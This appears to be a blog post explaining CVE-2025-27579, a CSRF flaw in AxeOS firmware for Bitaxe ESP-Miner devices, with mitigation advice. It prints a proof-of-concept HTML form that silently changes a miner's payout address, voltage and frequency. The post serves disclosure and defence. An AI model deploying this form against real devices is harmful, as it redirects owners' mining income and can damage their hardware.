CVE-2025-27579: Uncovering the Vulnerability in Bitaxe ESP-Miner, CSRF Attack on Payout and Frequency Settings Before Version 2.5.

Bitaxe has been a popular choice among Bitcoin miners for its ESP-Miner devices which provide exceptional performance. However, a recently discovered vulnerability, identified as CVE-2025-27579, affects Bitaxe ESP-Miner devices running the AxeOS firmware before version 2.5.. This vulnerability can allow an attacker to leverage CSRF (Cross-Site Request Forgery) attacks to change the payout addresses or modify frequency and voltage settings without user consent.

In this post, we'll dive deep into this vulnerability, explore the details of the exploit, and share potential steps to mitigate the risk.

Vulnerability Overview

CVE-2025-27579 refers to an issue in the AxeOS firmware that runs on Bitaxe ESP-Miner devices prior to version 2.5.. By exploiting this vulnerability, an attacker can execute a CSRF attack through the /api/system endpoint. As a result, the attacker can update the payout address – commonly known as stratumUser – for a Bitaxe Bitcoin miner without the user's knowledge. Additionally, this vulnerability allows the attacker to modify the device's frequency and voltage settings.

Exploit Details

To exploit this vulnerability, an attacker can create a malicious website or inject malicious code into a legitimate website. When the user visits the infected website, the malicious code sends a request through the /api/system endpoint. This request is then processed by the ESP-Miner device, leading to a change in the payout address or frequency/voltage settings. To illustrate this, let's take a look at the following code snippet:

<html>
  <body>
    <form action="http://<ESP-Miner IP>/api/system" method="POST">
      <input type="hidden" name="mode" value="cfg-set" />
      <input type="hidden" name="stratumUser" value="<NEW_PAYOUT_ADDRESS>" />
      <input type="hidden" name="voltage" value="<NEW_VOLTAGE_VALUE>">
      <input type="hidden" name="frequency" value="<NEW_FREQUENCY_VALUE>">
      <input type="submit" value="Submit" />
    </form>
  </body>
</html>

By using the above code, an attacker can easily manipulate the payout address, voltage, and frequency settings.

For further details on CVE-2025-27579, you can refer to the following sources

- National Vulnerability Database (NVD): NVD CVE-2025-27579
- Official Bitaxe GitHub Repository for AxeOS Firmware: Bitaxe-AxeOS

Mitigation Measures

To protect your Bitaxe ESP-Miner against this CSRF vulnerability, it is crucial first to update the AxeOS firmware to the latest version (2.5. or higher). This updated version has fixed the CSRF issue, providing better security for your Bitcoin mining activities.

Another security measure is to avoid visiting suspicious websites or clicking on unfamiliar links, as they might contain malicious code or lead to CSRF-attack exploits.

Conclusion

The discovery of CVE-2025-27579 has highlighted the potential security risks present in devices like Bitaxe ESP-Miner. If left unattended, these vulnerabilities can lead to financial losses or significantly damage your mining operations. Stay informed and keep your devices updated to ensure maximum security.

Timeline

Published on: 03/03/2025 00:15:43 UTC
Last modified on: 03/04/2025 19:15:38 UTC